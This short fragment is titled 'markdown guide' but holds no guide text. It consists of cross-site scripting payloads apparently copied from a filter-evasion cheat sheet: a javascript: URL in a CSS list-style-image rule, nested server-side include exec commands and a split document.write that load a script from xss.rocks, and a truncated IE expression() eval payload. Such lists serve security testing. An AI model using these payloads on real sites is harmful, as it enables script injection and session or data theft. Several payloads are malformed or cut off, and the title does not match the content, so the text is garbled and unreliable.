markdown guide

li {list-style-image: url("javascript:alert('XSS')");}

  • XSS

<!--#exec cmd="/bin/echo '<!--#exec cmd="/bin/echo 'IPT SRC=xss.rocks/xss.js>'"-->


document.write("<SCRI");PT SRC="httx://xss.rocks/xss.js">


<div style='x:expression((window.r==1)?'':eval('r=1;

